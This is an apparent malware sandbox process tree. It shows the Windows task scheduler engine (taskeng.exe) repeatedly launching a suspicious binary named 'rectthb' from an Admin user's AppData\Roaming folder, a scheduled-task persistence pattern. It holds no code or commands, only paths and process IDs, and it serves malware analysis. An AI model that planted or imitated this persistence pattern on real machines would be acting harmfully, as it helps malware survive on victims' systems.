C:\Windows\system32\taskeng.exetaskeng.exe {28E4D365-50D8-4043-A8AE-D4443F138975} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3700
-
C:\Windows\system32\taskeng.exetaskeng.exe {F9E05A44-BC70-426D-BBB1-E3D64812E47C} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1632
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵PID:2932
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {5ADC7F25-544C-463A-BE4D-3DA4A6011E5F} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3856
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵PID:2992
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {FA5DD7AA-B73D-448D-8A3C-E151444A770E} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1548
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵PID:4064
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {07C2604F-C2AD-4CAB-910E-4273078B791F} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2052
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵PID:3032
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8EC832D6-0F07-40BD-91EE-9A9FD929C145} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3300
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵PID:1548
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {AC307217-D149-427F-8A0F-522889E58F1A} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2052
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵PID:4000
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {0138A4E9-4485-4EE1-BD03-FDD2942CF142} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3792
-
C:\Windows\system32\taskeng.exetaskeng.exe {AE605642-133B-420A-A2C7-6FBC3BA56B31} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3512
-
C:\Users\Admin\AppData\Roaming\rectthbC:\Users\Admin\AppData\Roaming\rectthb2⤵PID:3404
-